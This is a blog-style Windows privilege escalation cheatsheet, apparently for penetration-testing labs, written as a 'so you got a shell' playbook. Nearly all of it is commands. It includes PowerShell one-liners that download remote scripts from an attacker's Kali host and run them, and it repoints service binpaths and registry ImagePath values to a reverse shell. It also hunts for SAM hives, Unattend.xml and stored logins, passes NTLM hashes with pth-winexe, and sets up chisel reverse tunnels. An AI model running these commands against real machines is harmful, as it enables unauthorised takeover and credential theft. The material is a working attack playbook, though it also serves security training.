Win Priv Esc II

Windows Privilege Escalation Cheatsheet

So you got a shell, what now?

This post will help you with local enumeration as well as escalate your privileges further.

Usage of different enumeration scripts and tools is encouraged, my favourite is WinPEAS. If confused which executable to use, use this

Keep in mind:

• To exploit services or registry, you require:

• • appropriate write permissions

  • service start permission

  • service stop permission

• Look for non-standard programs on the system

Note: This is a live document. I’ll be adding more content as I learn more

Binaries

Get 64-bit netcat from here

Get Chisel from here

General Information

# If nothing is specified, assume command can be run on cmd.exe or powershell.exe

whoami

echo%username%

whoami /all

hostname

echo%hostname%

net users

net users username

# Note hostname, patches, architecture

systeminfo

# Both should be the same for ease of exploitation

# PowerShell

# Make a 64-bit shell using nc64.exe

[environment]::Is64BitOperatingSystem

[environment]::Is64BitProcess

# Check LanguageMode (FullLanguage is nicer to have)

$ExecutionContext.SessionState.LanguageMode

# Check AppLocker policy

Get-AppLockerPolicy-Effective

# View RuleCollections in detail

Get-AppLockerPolicy-Effective| select-ExpandedPropertyRuleCollections

# all, addresses:port, PID

netstat -ano

File Transfer

# On KALI

# use double-quotes if file path has spaces in it

sudo impacket-smbserverabcd /path/to/serve

# mount drives

net use abcd: \\kali_ip\myshare

net use abcd: /d # disconnect

net use abcd: /delete # then delete

# PowerShell

New-PSDrive-Name"abcd"-PSProvider"FileSystem"-Root"\\ip\abcd"

Remove-PSDrive-Nameabcd

# OR copy directly from the share without mounting

copy//kali_ip/abcd/file_name C:\path\to\save

copyC:\path\to\file //kali_ip/abcd

copy"C:\Program Files\..\legit.exe"C:\Temp

copy/Y C:\Downloads\shell.exe "C:\Program Files\...\legit.exe"

# Download to Windows

# Load script in memory

powershell.exe -nop-epbypass -c"IEX(New-Object Net.WebClient).DownloadString('http://ip/file')"

powershell.exe iex(iwrhttp://ip/file -usebasicparsing)

# Save script on disk

powershell.exe -nop-epbypass -c"IEX(New-Object Net.WebClient).DownloadFile('http://ip/file','C:\Users\Public\Downloads\file')"

powershell.exe -nop-epbypass -c"IWR -URI 'http://ip/file' -Outfile '/path/to/file'"

certutil -urlcache-fhttp://kali_ip/file file

Automated Enumeration

# Run winPEAS

# For color:

# > REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

# > cmd.exe

.\winpeasany.exe quiet

Accesschk

# .\accesschk.exe /accepteula

# -c : Name a windows service, or use * for all

# -d : Only process directories

# -k : Name a registry key e.g., hklm/software

# -q : Omit banner

# -s : Recurse

# -u : Suppress errors

# -v : Verbose

# -w : Show objects with write access

# Check service permissions

# ALWAYS RUN THE FOLLOWING TO CHECK IF YOU'VE PERMISSIONS TO START AND STOP THE SERVICE

.\accesschk.exe /accepteula -ucqv<user> <svc_name>

# Get all writable services as per groups

.\accesschk.exe /accepteual -uwcqvUsers *

.\accesschk.exe /accepteula -uwcqv"Authenticated Users"*

# Is dir writable? - Unquoted service paths

.\accesschk.exe /accepteula -uwdv"C:\Program Files"

# User permissions on an executable

.\accesschk.exe /accepteula -uqv"C:\Program Files\...\file.exe"

# Find all weak permissions - folders

.\accesschk.exe /accepteula -uwdqsUsers c:\

.\accesschk.exe /accepteula -uwdqs"Authenticated Users"c:\

# Find all weak permissions - files

.\accesschk.exe /accepteula -uwqsUsers c:\*.*

.\accesschk.exe /accepteula -uwqs"Authenticated Users"c:\*.*

# Registry ACL - Weak registry permissions

.\accesschk.exe /accepteula -uvwqkHKLM\System\CurrentControlSet\Services\svc_name

# PowerShell

Get-AclHKLM\System\CurrentControlSet\Services\svc_name | Format-List

# Get rights of any file, or folder

# PowerShell

(get-aclC:\path\to\file).access | ftIdentityReference,FileSystemRights,AccessControlType

sc.exe

# Query service configuration

# Verify after doing all the changes

scqc svc

# Current state of the service

scquery svc

# Modify config

scconfig svc binpath= "\"C:\Downloads\shell.exe\""

# if dependencies exist

scconfig depend_svc start= auto

net startdepend_svc

net startsvc

# can instead remove dependency too

scconfig svc depend= ""

# Start/stop the service

net start/stop svc

Registry

# Query configuration of registry entry of the service

reg query HKLM\System\CurrentControlSet\Services\svc_name

# Point the ImagePath to malicious executable

reg add HKLM\SYSTEM\CurrentControlSet\services\svc_name /v ImagePath /t REG_EXPAND_SZ /d C:\path\shell.exe /f

# Start/stop the service to get the shell

net start/stop svc

# Execute a reverse_shell.msi as admin

# Manually, both query's output should be 0x1 to exploit

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Credentials or Hashes

# Common creds location, always in plaintext

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogin"

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"/s

# If found, prints the location of the file

dir/s <filename> # or extensions

dir/s SAM

dir/s SYSTEM

dir/s Unattend.xml

# Found creds?

# On KALI

# --system only works if admin creds are on hand

winexe -U'admin%pass123'[--system] //10.10.10.10cmd.exe

# Found hash?

pth-winexe-U'domain\admin%LM:NTLM'[--system] //10.10.10.10cmd.exe

RunAs

# cmd

runas /savecred /user:admin C:\abcd\reverse.exe

# PowerShell Runas 1

$password= ConvertTo-SecureString'pass123'-AsPlainText-Force

$cred= New-ObjectSystem.Management.Automation.PSCredential('Administrator', $password)

Start-Process-FilePath"powershell"-argumentlist"IEX(New-Object Net.WebClient).downloadString('http://kali_ip/shell.ps1')"-Credential$cred

# PowerShell Runas 2

$username= "domain\Administrator"

$password= "pass123"

$secstr= New-Object-TypeNameSystem.Security.SecureString

$password.ToCharArray() | ForEach-Object{$secstr.AppendChar($_)}

$cred= new-object-typenameSystem.Management.Automation.PSCredential -argumentlist$username, $secstr

Invoke-Command-ScriptBlock{ IEX(New-ObjectNet.WebClient).downloadString('http://10.10.14.16/shell.ps1') } -Credential$cred-Computerlocalhost

Find Files Fast

dir/s <filename> # or extensions

Get-ChildItem-PathC:\ -Include*filename_wildcard* -Recurse-ErrorActionSilentlyContinue

Port Forwarding

# If some port are listening on the target machine but inaccessible, forward the ports - Port Forwarding

# winexe, pth-winexe, smbexec.py, psexec works on 445, MySQL on 3306

# On KALI

./chisel server --reverse--port9001

# On Windows

.\chisel.exe client KALI_IP:9001R:KALI_PORT:127.0.0.1:WINDOWS_PORT

# Example --> .\chisel.exe client KALI_IP:9001 R:445:127.0.0.1:445

# On KALI

winexe -U'administrator%pass123'--system//127.0.0.1KALI_PORT

smbexec.py domain/username:password@127.0.0.1

mysql --host=127.0.0.1--port=KALI_PORT -uusername -p

Exploit suggester

Windows exploit suggester can be found here

# On KALI

# Find exploits

# .\windows-exploit-suggester.py --update

.\windows-exploit-suggester.py -isysteminfo.txt -d2020-xxx.xlsx

FuzzySecurity | Windows Privilege Escalation Fundamentalswww.fuzzysecurity.com

PayloadsAllTheThings/Methodology and Resources/Windows - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Windows Privilege Escalation Guidewww.absolomb.com

Privilege Escalation - Windows · Total OSCP Guidesushant747.gitbooks.io